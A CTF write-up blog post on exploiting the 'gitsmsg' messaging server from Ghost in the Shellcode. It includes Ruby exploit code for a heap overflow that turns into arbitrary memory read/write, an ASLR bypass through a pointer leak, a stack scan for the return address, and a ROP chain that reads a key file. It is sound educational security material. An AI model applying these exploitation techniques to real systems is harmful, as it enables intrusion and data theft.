“It’s Saturday night; I have no date, a 2L bottle of Shasta, and my all-rush mix tape. Let’s rock!”
…that’s what I said before I started gitsmsg. I then entered “Rush” into Pandora, and listened to a mix of Rush, Kansas, Queen, Billy Idol, and other 80’s rock for the entire level. True story.
Anyway, let’s get on with it! Not too long ago I posted my writeup for the 100-level “Pwnage” challenge from Ghost in the Shellcode. Now, it’s time to get a little more advanced and talk about the 299-level challenge: gitsmsg. Solved by only 11 teams, this was considerably more challenging.
As before, you can obtain the binary, my annotated IDA database, and exploit code on my Github page
Overview
I’ll start right out by saying: gits was a huge timesink, for me. It was a Linux-based 32-bit application, which was nice, but the codebase was biiiiig and scary, it took a long time to reverse it, and then possibly even longer to get the exploit working. I’ll explain the bumps I hit as I go through this.
The summary is, it’s a messaging server. You log in, queue/view/modify/delete messages for other users, send those messages, and read your own. The messages are stored in a heap-based linked list, and one type of message was vulnerable to a heap-based overflow. To make things difficult, the system implemented address-space layout randomization (ASLR) and data execution prevention (DEP), which had to be bypassed, as well as having read-only relocations (RELRO)enabled, which marks its imports as read-only once they’ve been set up by the dynamic linker.
So, a heap overflow on a system with all modern protections. Sounds like a challenge!
This time, I’m not going to spend any time on the assembly or reversing portions, there’s just too much. I’ll describe the protocol, the vulnerability, and the exploit. My IDA file—available from the Github link above—is heavily annotated, so feel free to peruse it! And if you’re going to debug it, make sure you disable fork()/alarm() as I described in my last post!
The protocol
As I mentioned before, this is a messaging server. It supports eight different payload types, numbered 0x10 to 0x17, which can be used in nine different message types, numbered 0x01 to 0x09. Just for fun, here are my scratch notes I wrote while working on it.
Payload types
The following payloads are defined:
- 0x10 :: a byte (uint8)
- 0x11 :: an integer (uint32)
- 0x12 :: a double (uint64)
- 0x13 :: an array of bytes (uint8[])
- 0x14 :: an array of integers (uint32[])
- 0x15 :: an array of doubles (uint64[])
- 0x16 :: a static null-terminated string (there are 4 or 5 possible choices, indexed with a byte value)
It’s possible that the types I called double might actually be intended as 64-bit integers, but ultimately it doesn’t matter.
No message can be longer than 0x400 bytes, total. Which means an array of doubles can’t be longer than 0x80 elements (0x80 elements * 8 bytes/element = 0x400 bytes).
Message types
These payload types can be used in any of the 9 message types:
- 0x01 :: login :: must be sent initially, also retrieves your messages
- 0x02 :: delete_queued_message :: unlinks a message from a linked list
- 0x03 :: retrieve_my_messages :: retrieve a list of the queued messages I've sent
- 0x04 :: store_message :: saves a message into a linked list of queued messages
- 0x05 :: get_stored_message :: retrieves and displays a message from a linked list
- 0x06 :: do_weird_math :: loops through the messages and does some kind of math that I didn't dig into
- 0x07 :: send_queued_messages :: writes all your messages to the filesystem under the recipient's username; he'll get them when he logs in
- 0x08 :: edit_queued_message :: edit a queued message
- 0x09 :: quit
Message struct
The messages are all stored in a struct that looks like:
- (uint32) unknown
- (uint32) message_type
- (uint32) message-specific payload (see below)
- (uint32) message-specific payload (part 2)
- (char[256]) from_username
- (char[256]) to_username
- (char[240]) filename
- (char[272]) unknown/unused
- (void*) next_message </ul> Basically, a linked list. The most interesting field is "message-specific payload", which contains different data depending on the message_type (I'm guessing it's implemented as a union in the original program). For the simple datatypes (byte/int32/double), the message-specific payload is simply the 8-, 32-, or 64-bit value, stored across the pair of message-specific payload values. For the array types (byte array/int32 array/double array), the first message-specific payload value is a 32-bit pointer to some freshly allocated memory, and the second is the length of said memory (this pair will be very important later, when we read/write arbitrary memory!). Finally, for the static string type, it's a pointer to one of several static strings that are hardcoded into the binary (this value will be useful later when we want to bypass ASLR). Later on, there's a field I called 'unknown/unused'; I suspect that it's simply designed to make the struct bigger than a single message can possibly be—0x400 bytes—to prevent overwriting the 'next_message' pointer. But that's purely an unvalidated guess, especially since there are easier and better ways to get an arbitrary memory write (as I'll explain later).
The vulnerability
I actually found this issue quite by accident. I was implementing the store/get protocol, and I kept getting mysterious SIG_ABRT messages. I plugged in a debugger and found that it was crashing in malloc(). Sweet! Sounds like a heap overflow! I narrowed it down by simply adding/removing messages of the different types, until I discovered that message type 0x15—DOUBLE_ARRAY—was the culprit. I took a look at the code that saves the double arrays to memory and immediately noticed this:.text:B7FFD897 mov eax, dword ptr [esp+3Ch+local_length] ; jumptable 000017B1 case 5 .text:B7FFD89B lea esi, [eax*8+0] ; esi = local_length * 8 .text:B7FFD8A2 cmp esi, 3FFh .text:B7FFD8A8 mov [ebp+message.length_for_certain_types], eax .text:B7FFD8AB ja return_send_1005 .text:B7FFD8B1 mov [esp+3Ch+out_arg_0], eax ; size .text:B7FFD8B4 call _malloc ; XXX - VULN! Allocate the wrong number of bytes - it's not multiplying by 8 .text:B7FFD8B9 test eax, eax .text:B7FFD8BB jnz short receive_esi_bytes_into_eax .text:B7FFD8BD lea esi, [esi+0] .text:B7FFD8C0 jmp return_send_1005It's multiplying the array size by 8, but not the malloc'd size! That means it'll always try to copy 8x too much data into the array! Now, what can we do with this?
Reading and writing arbitrary memory
It's important to remember the structure of array-containing messages to understand how to read memory. In particular, this structure:- (uint32) unknown
- (uint32) message_type
- (uint32) message-specific payload (pointer)
- (uint32) message-specific payload (length)
- ...
1 s = TCPSocket.new("192.168.1.119", 8585) 2 3 receive_code(s, 0x00001000, "init") 4 5 login(s) 6 7 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10) 8 result = get(s, 0) 9 10 Hex.print(result)Everything will be normal and it'll output:
0000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAAGreat! Now let's allocate a int32 array, right after the double array:
... 1 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10) 2 store(s, VARDATA_TYPE_INT_ARRAY, [0x42424242] * 2) 3 Hex.print(get(s, 1)) 4 Hex.print(get(s, 0))We get this output:
2 0000 41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00 AAAAAAAAAAAA.... 3 0010 01 00 00 00 14 00 00 00 48 28 00 B8 02 00 00 00 ........H(...... 4 0020 41 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41 AAAAAAAAAA.AAAAA 5 0030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 6 0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 7 Length: 0x50 (80) 8 0000 42 42 42 42 42 42 42 42 BBBBBBBB 9 Length: 0x8 (8)Woah, what's going on here!? What we're actually seeing is the first 0x0c (12) bytes of the double array that we created, printing out as normal (a bunch of 'A's), followed by the Heap header of the next message! The first array thinks it has 80 bytes to itself, and uses/displays all of them, when in reality it only actually has about 12 bytes (we only allocated 8 bytes, but rounding happens). The remaining 68 bytes are still in the heap's pool, and are completely fair game to be allocted. Then, when the second array is allocated, it takes up those bytes. In other words, we have memory that looks like this:
------------------------------------------------------------------------------------------------------ | Unallocated.......... | ------------------------------------------------------------------------------------------------------ | [empty memory] | ------------------------------------------------------------------------------------------------------The first array is stored in allocated memory. First, the message metadata (the type, message-specific data, to, from, filename, next message) is allocated. We'll ignore that for now. More importantly, the data buffer is allocated, and it's allocated too short! Then array requests 8 bytes to store all its data, and gets 12 bytes (because rounding or whatever):
------------------------------------------------------------------------------------------------------ | array1 | Unallocated.......... | ------------------------------------------------------------------------------------------------------ | [empty memory] | ------------------------------------------------------------------------------------------------------The first array thinks it has 80 bytes, and fills it all up
------------------------------------------------------------------------------------------------------
| array1 | Unallocated.......... |
------------------------------------------------------------------------------------------------------
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
------------------------------------------------------------------------------------------------------
Then along comes array2. Two chunks of memory are allocated for it, as well. The message metadata is allocated first, then a buffer for the message data is allocated. Because the metadata is allocated first, it ends up right after array1, and immediately populates the heap header:
------------------------------------------------------------------------------------------------------
| array1 | array2 metadata...... |
------------------------------------------------------------------------------------------------------
|AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
------------------------------------------------------------------------------------------------------
Then message2 populates its various values, including the type (0x14 = INT_ARRAY), message-specific data (pointer to buffer = 0xb8002848, and length = 0x00000002), and from_username (which, kind of confusingly, I set to all 'A's). In the end, the entire rest of array1 is overwritten:
------------------------------------------------------------------------------------------------------ | array1 | array2 metadata...... | ------------------------------------------------------------------------------------------------------ |AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00\x48\x28\x00\xb8\x02\x00\x00\x00AAAAAAAAAAAAAAAAAAAAA...| ------------------------------------------------------------------------------------------------------Then, when we displayed it, we saw exactly that. The most interesting part of this is the message-specific data at bytes 0x18 - 0x20 of array2: 0xb8002848 and 0x00000002. They are part of the second array's metadata, and are located right smack in the middle of where the first array thinks its data is! And since the first array thinks the memory belongs to it, we can read/write it via the first array. To put it another way, when array1 thinks it's editing its own value, it's actually editing array2's metadata. What happens if I now edit the first array (the value here, 0xB7FFEC04, is a place where I happen know I'll find a static string in memory)?
edit(s, 1, 3, [0xB7FFEC04, 10].pack("II"))Then read the second?
Hex.print(get(s, 0))It's going to dump out whatever happened to be in memory! It's truncated to the length I set (10 bytes) multiplied by the element size (and INT_ARRAY has 4-byte elements) for a total length of 40 bytes:
1 Length: 0x8 (8) 2 0000 2F 68 6F 6D 65 2F 67 69 74 73 6D 73 67 2F 6D 73 /home/gitsmsg/ms 3 0010 67 73 2F 25 73 2F 25 30 38 78 25 30 38 78 00 00 gs/%s/%08x%08x.. 4 0020 55 6E 62 72 65 61 6B 61 UnbreakaGoing back to the memory layout we looked at before, we saw that the message-specific data (the pointer and the length) overwrote array1:
------------------------------------------------------------------------------------------------------
| array1 | array2 metadata...... |
------------------------------------------------------------------------------------------------------
|AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00\x48\x28\x00\xb8\x02\x00\x00\x00AAAAAAAAAAAAAAAAAAAAA...|
------------------------------------------------------------------------------------------------------
But we modified array1 to change those values:
------------------------------------------------------------------------------------------------------
| array1 | array2 metadata...... |
------------------------------------------------------------------------------------------------------
|AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00\x04\xec\xff\xb7\x0a\x00\x00\x00AAAAAAAAAAAAAAAAAAAAA...|
------------------------------------------------------------------------------------------------------
And therefore, when array2 thought it was reading from its own buffer, it was actually reading from the wrong location - 0xB7FFEC04.
(If we use the edit() function on array2, we can write to that memory as well.)
The summary is, we can read and write arbitrary memory, by allocating two arrays, using the first to modify the second's metadata, then reading or writing the second's data.
Still with me? I hope so!
Bypassing ASLR
For those of you who don't know what ASLR is, I recommend reading the Wikipedia page. The summary is, it means that modules and stack don't load to the same address twice. So, even though I have an arbitrary read/write memory attack, I don't know where memory is, in theory. So how do we find it? The first thing to realize is that the size of the binary in memory doesn't change, and the parts within the binary don't get re-arranged, so if we can determine where anything in the binary gets loaded, we can use clever math to figure out where everything gets loaded. We just have to leak a single address. How do we leak a single address? It turns out, with the read-memory attack we just saw, this is rather easy. We allocate a double array, as usual, which will get overwritten by the next allocation:1 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)Then we allocate a static string, which will overwrite the latter part of the double array:
1 store(s, VARDATA_TYPE_STRING, 0)As I've mentioned before, the strings are indexes into a hardcoded list of strings. Therefore, the address of a static string in the binary will be saved in the message-specific data. Now, if we print out the double array:
1 Hex.print(get(s, 1))We get the address of the first such string:
1 0000 41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00 AAAAAAAAAAAA.... 2 0010 01 00 00 00 16 00 00 00 B0 EB FF B7 00 00 00 00 ................ 3 ...which is 0xb7ffebb0, in this case. I know—from the disassembled code—that this value is always 0x2bb0 bytes from the start of the binary, so I can calculate that the base address is 0xb7ffebb0 - 0x2bb0, or at address 0xb7ffc000 on this particular execution. From now on, I can base every address on that. And thus, ASLR has been bypassed for the binary. But not, sadly, for the stack. I couldn't find any way to leak a useful stack address.
Controlling EIP
Up till now, every writeup I've read has taken essentially the same steps, although they don't go through them in as much detail as me (I love writing :) ). However, this is where paths diverge, and no two people have taken the same one. The most obvious solution to controlling EIP is to overwrite the global offset table, which is the same as the solution to TI-1337. But, after a lot of mysterious crashing and debugging, I found out what RELRO means: it means that the relocations are re-mapped as read-only after they are filled in. The .dtor section (destructors) are likewise mapped as read-only. Crap! I spent a long, long time trying to figure out what to overwrite. Can I cause path traversal? Can anything in the .data section cause an overflow? Can I read a stack address from anywhere in known memory? etc. etc., but no dice. Eventually, I realized that I could read large chunks of memory, so why don't I read the entire space where the stack might be? Experimentally, I determined that, at least on my system, the stack was always between 0xBF800000 and 0xBFFFFFFF. With that in mind, I wrote this beast:1 # This function is kind of an ugly hack, but it works reliably so I can't really 2 # complain. 3 # 4 # It basically searches a large chunk of memory for a specific return address. 5 # When it finds that address, it returns there. 6 def find_return_address(s, base_addr) 7 address_to_find = [base_addr + MAIN_RETURN_ADDRESS].pack("I") 8 9 # Store an array of doubles. This will overlap the next allocation 10 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x5e5e5e5e5e5e5e5e] * 4) 11 12 # Store an array of bytes. We'll be able to change the length and locatino 13 # of this buffer in order to read arbitrary memory 14 store(s, VARDATA_TYPE_BYTE_ARRAY, [0x41]) 15 16 # Overwrite the location and size of the byte array. The location will be 17 # set to STACK_MIN, and the size will be set to STACK_MAX - STACK_MIN 18 edit(s, 1, 3, [STACK_MIN, (STACK_MAX - STACK_MIN)].pack("II")) 19 puts("Reading the stack (0x%08x - 0x%08x)..." % [STACK_MIN, STACK_MAX]) 20 21 # We have to re-implement "get" here, so we can handle a large buffer and 22 # so we can quit when we find what we need 23 out = [MESSAGE_GET, 0].pack("II") 24 s.write(out) 25 get_int(s) # type (don't care) 26 len = get_int(s) 27 result = "" 28 29 # Loop and read till we either reach the end, of we find the value we need 30 while(result.length < len) 31 result = result + s.recv(STACK_MAX - STACK_MIN + 1) 32 33 # As soon as we find the location, end 34 if(loc = result.index(address_to_find)) 35 return STACK_MIN + loc 36 end 37 end 38 39 # D'awww :( 40 puts("Couldn't find the return address :(") 41 exit 42 endIt uses the exact same technique as we initially used to read that static string from memory, except instead of reading 20 or 30 bytes, it reads 0x7fffff—that's about 8 megabytes. Somewhere in that chunk of memory will be the actual stack. And somewhere on the stack will be the return address of the main looping function. And, fortunately, because I can capture the base address of the binary (outlined last section), I know exactly what that address will be! To put it another way: I know that the main loop returns to an address when it's done. I can calculate that address, and therefore I know the absolute return address of the main loop. If I know it, it means I can find it on the stack. And if I can find it on the stack, it means I can change it. Here's some code that finds the address and changes it:
1 # Set up the connection 2 s = TCPSocket.new("192.168.1.119", 8585) 3 receive_code(s, 0x00001000, "init") 4 login(s) 5 6 # Get the base address 7 base_addr = get_base_address(s) 8 9 # Get the return address 10 return_address = find_return_address(s, base_addr) 11 12 # Do a typical overwrite - overwrite the main loop's return address 13 # with 0x43434343 14 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10) 15 store(s, VARDATA_TYPE_INT_ARRAY, [0x42424242]) 16 edit(s, 1, 3, [return_address, 1].pack("II")) 17 edit(s, 0, 0, [0x43434343].pack("I")) 18 19 # Cause the main loop to return 20 quit(s)Can you guess what happens to the server?
Program received signal SIGSEGV, Segmentation fault. 0x43434343 in ?? ()Yup, EIP control. To summarize: reading the entire stack is hacky, and I doubt it will work on a 64-bit system, but it worked great in this case!
Aside: Stashing data
It's really easy to stash data and get the address back. I'm going to want to open and read a file, later, so I need a way to stash the file and reference it later. This documented code should explain everything:# Store a series of bytes in memory, and return the absolute address # to where in memory those bytes are stored def stash_data(s, data) # Store an array of doubles - this will allocate 4 bytes and overwrite 32 store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x5e5e5e5e5e5e5e5e] * 4) # Store an array of bytes, which are the data. It will allocate a buffer # in which to store these bytes, a pointer to which is written over the # previous entry store(s, VARDATA_TYPE_BYTE_ARRAY, data.bytes.to_a) # Get bytes 24 - 27 of the double array, which is where a pointer to the # allocated buffer (containing 'data') will be stored result = get(s, 1)[24..27].unpack("I").pop puts("'%s' stored at 0x%08x" % [data, result]) return result end
Getting execution
So, I got this all working, and immediately stashed some simple shellcode and jumped to it. And it crashed. That means that data execution prevention—DEP—is enabled, so I can only execute code from +x sections of memory. I know how to do that fairly easily, but it was a kick in the face after all that work. Just make this easy on me, guys! :) This isn't going to teach you how to write a ROP payload (one of my past CTF blogs will teach you in great detail!). But let me tell you: once you do this a couple times, it actually gets really easy!Another aside: helpful hint on testing your exploit
Super helpful hint: the first thing I did after realizing that DEP was enabled was jump to base_addr+0x2350, which looks like this:.text:B7FFE350 .text:B7FFE350 handle_packet_00000009_quit: ; CODE XREF: do_client_stuff+71j .text:B7FFE350 ; DATA XREF: do_client_stuff:off_B7FFE324o .text:B7FFE350 mov [esp+2Ch+out_arg_0], 1003h ; packet 9 returns the integer 0x00001003 then exits .text:B7FFE357 call send_int .text:B7FFE35C .text:B7FFE35C loc_B7FFE35C: ; CODE XREF: do_client_stuff+5Bj .text:B7FFE35C add esp, 20h .text:B7FFE35F xor eax, eax .text:B7FFE361 pop ebx .text:B7FFE362 pop esi .text:B7FFE363 pop edi .text:B7FFE364 retnIt sends out the integer 0x1003, then attempts to return (and probably crashes). But getting that 0x1003 back from the socket after writing this was exactly the push I needed to keep going: I knew my EIP-control was working. Besides returning into known-good code like that, the shellcode eb fe (jmp -2) and cd 03 (debug breakpoint) are fantastic ways to debug exploits. The former never returns, and the latter crashes immediately (and gives you debug control if it's local). It's the perfect way to test if your code is actually being run!
Back to our originally scheduled program...
All right, let's look at our ROP chain!# This generates the ROP stack. It's a simple open + read + write. The # only thing I'm not proud of here is that I make an assumption about what # the file handle will be after the open() call - but it seems to reliably # be '1' in my testing def get_rop(file_path, base_addr, fd) stack = [ # open(filename, 0) base_addr + OPEN, # open() base_addr + PPR, # pop/pop/ret file_path, # filename = value we created 0, # flags # read(fd, filename, 100) # We're re-using the filename as a buffer base_addr + READ, # read() base_addr + PPPR, # pop/pop/pop/ret 0, # fd - Because all descriptors are closed, the first available descriptor is '0' file_path, # buf 100, # count # write(fd, filename, 0) base_addr + WRITE, # write() base_addr + PPPR, # pop/pop/pop/ret fd, # fd file_path, # buf 100, # count # This was simply for testing, it sends 4 bytes then exits #base_addr + 0x2350 ] return stack endOnce again, this is fairly simple! We open a file. The file_path is something we stashed earlier, and is "/home/gitsmsg/key". We return to a pop/pop/ret to clean the two arguments off the stack. We read up to 100 bytes from the file into the place where we stashed the filename (since it's handy and writeable). We use the file handle 0, because that's the handle that's always used (all the handles are closed in the child process, and the syscall promises to use the lowest un-used handle). Hardcoding the file handle was ugly, but way easier than actually figuring it out. We write up to 100 bytes from that buffer back to the main file descriptor of the connection—that is, back to the socket that I'm communicating through. This descriptor was obtained by reading the right place in memory. It's simple, but it works! And if all goes according to plan, here's the exploit running:
$ ruby sploit.rb ** Initializing ** Logging in ** Stashing a path to the file on the heap '/home/gitsmsg/key' stored at 0xb8c2f848 ** Using a memory leak to get the base address [ASLR Bypass] ... found it @ 0xb77dd000! ** Reading the file descriptor from memory ... it's 4! ** Searching stack memory for the return address [Another ASLR Bypass] Reading the stack (0xbf800000 - 0xbfffffff)... ... found it @ 0xbfd0546c ** Generating the ROP chain [DEP Bypass] ** Writing the ROP chain to the stack ** Sending a 'quit' message, to trigger the payload ** Crossing our fingers and waiting for the password The key is: lol, tagged unions for the WIN!w00t! Full exploit is here.
Comments
Join the conversation on this Mastodon post (replies will appear below)!
Loading comments...